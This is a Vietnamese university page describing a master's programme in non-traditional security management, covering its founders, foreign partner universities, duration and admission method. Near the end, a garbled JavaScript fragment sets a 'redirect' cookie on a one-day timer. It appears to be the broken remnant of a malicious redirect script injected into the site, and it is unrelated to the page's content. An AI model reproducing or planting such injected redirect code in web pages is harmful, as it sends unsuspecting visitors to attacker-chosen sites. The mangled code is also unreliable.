Thạc sĩ Quản trị An ninh Phi truyền thống (MNS)

Chương trình đào tạo Thạc sĩ Quản trị An ninh phi truyền thống (Master in Management of Non-traditional Security, MNS) của Khoa Quản trị và Kinh doanh (HSB) là một chương trình đào tạo mới, có tính liên ngành cao, là chương trình tiên phong trong khu vực Đông Nam Á đào tạo về các vấn đề an ninh phi truyền thống.

Chương trình ra đời là phù hợp với Nghị quyết Hội nghị lần thứ 8 Ban chấp hành Trung ương Đảng (Khóa XI) về Chiến lược bảo vệ Tổ quốc Việt Nam trong tình hình mới.

Chương trình được sáng tạo và thiết kế bởi nhóm các chuyên gia hàng đầu về khoa học liên ngành gồm GS.TS. Mai Trọng Nhuận; Thượng tướng, TS. Nguyễn Văn Hưởng; PGS.TS. Hoàng Đình Phi; GS.TSKH. Vũ Minh Giang và được triển khai tại HSB với sự hợp tác xây dựng và giảng dạy của Đại học San Diego, Mỹ; Trường Quản trị, Đại học Queensland, Australia; Đại học Nanyang, Singpore; Trường Kinh doanh IPAG, CH Pháp.

1. Hệ đào tạo: Thạc sĩ.

2. Ngành: Quản trị liên ngành (thí điểm)

3. Chuyên ngành: Quản trị An ninh phi truyền thống

4. Văn bằng: thạc sĩ chính quy do Đại học Quốc gia Hà Nội cấp

5. Ngôn ngữ đào tạo: tiếng Việt

6. Thời gian đào tạo: 18-24 tháng, thời gian học vào thứ Bảy và Chủ nhật hàng tuần

7. Hình thức thi tuyển: đánh giá hồ sơ, phỏng vấn chuyên môn và viết luận

8. Khung chương trình đào tạo:

{edocs}/docs/khung/05.pdf,100%,868{/edocs}

                                                                                                          Phòng Đào tạo

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.